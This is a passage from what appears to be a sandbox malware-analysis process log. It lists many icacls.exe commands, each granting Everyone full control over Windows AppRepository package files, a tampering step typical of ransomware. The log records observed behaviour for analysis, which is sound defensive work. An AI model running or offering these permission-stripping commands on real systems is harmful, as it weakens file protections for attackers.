  PID:17624
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Advertising.Xaml_10.0.1605.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6004
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BingWeather_4.18.56.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13180
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BingWeather_4.18.56.0_neutral_split.scale-150_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13832
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BingWeather_4.18.56.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15196
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13740
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BioEnrollment_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14048
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.CredDialogHost_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:17676
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.0.10252.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15756
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.0.10252.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14208
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14160
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.1.25002.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4544
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Getstarted_4.5.6.0_neutral_split.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10244
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Getstarted_4.5.6.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15380
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13916
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.LockApp_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:12220
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Messaging_3.2.24002.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14100
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Messaging_3.26.24002.0_neutral_split.scale-150_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14124
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:3612
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Microsoft3DViewer_1.1702.21039.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11984
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Microsoft3DViewer_1.1702.21039.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14996
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftEdge_40.15063.0.0_neutral__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11364
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4204
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftOfficeHub_2017.311.255.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:3348
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4396
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14240
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16992
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5472
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15824
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16336
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14544
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16140
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:7960
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MSPaint_1.1702.28017.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6012
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14172
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Framework.1.3_1.3.24201.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6140
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Framework.1.3_1.3.24201.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5292
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.3_1.3.23901.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14504
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.3_1.3.23901.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14236
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:17000
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.4_1.4.24201.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16952
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.4_1.4.24201.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11280
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Office.OneNote_2015.7668.58071.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11312
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.OneConnect_2.1701.277.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16884
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.OneConnect_2.1701.277.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16212
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.OneConnect_2.1701.277.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16228
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.People_10.1.10531.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16772
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5200
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.People_2017.222.1920.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5976
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.PPIProjection_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16452
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.SkypeApp_11.8.204.0_neutral_split.scale-125_kzf8qxf38zg5c.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10064
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.SkypeApp_11.8.204.0_neutral_~_kzf8qxf38zg5c.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9848
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.SkypeApp_11.8.204.0_neutral_split.scale-125_kzf8qxf38zg5c.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10060
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:12056
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.StorePurchaseApp_1.0.45.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16500
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.StorePurchaseApp_1.0.454.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:17152
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.VCLibs.140.00_14.0.24123.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11880
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.VCLibs.140.00_14.0.24123.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:3228
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15260
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Apprep.ChxApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10120
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Wallet_1.0.16328.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11408
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.AssignedAccessLockApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:17432
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.CloudExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15328
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ContentDeliveryManager_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:12048
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.HolographicFirstRun_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9888
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Cortana_1.8.12.15063_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16508
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ModalSharePickerHost_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8396
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.OOBENetworkCaptivePortal_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15356
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.OOBENetworkConnectionFlow_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:17980
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ParentalControls_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9940
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11440
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Photos_2016.511.9510.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9936
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:1648
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:12552
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.SecureAssessmentBrowser_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13292
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ShellExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:17588
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.SecureAssessmentBrowser_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4952
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.WindowPicker_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:17748
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:17528
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8636
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsAlarms_2017.203.236.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:17516
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCalculator_10.1702.312.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:15620
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsAlarms_2017.203.236.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10204
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:17740
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCalculator_2017.131.1904.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10280
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCamera_2017.125.40.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5016
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13796
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13264
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\microsoft.windowscommunicationsapps_2015.7906.42257.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:17704
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11976
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:17644
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:12532
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11724
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsMaps_2017.209.105.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:17896
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16664
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10016
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11876
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14360
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9976
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_2017.130.1208.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11236
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_2017.130.1208.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:1988
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16544
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsStore_11701.1001.874.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8080
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_2017.113.1250.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:18068
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:17948
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:17772
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13868
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10156
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxGameOverlay_1.15.2003.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14892
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:17992
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8432
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxIdentityProvider_2016.719.1035.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13268
- C:\Windows\SYSTEM32\icacls.exe
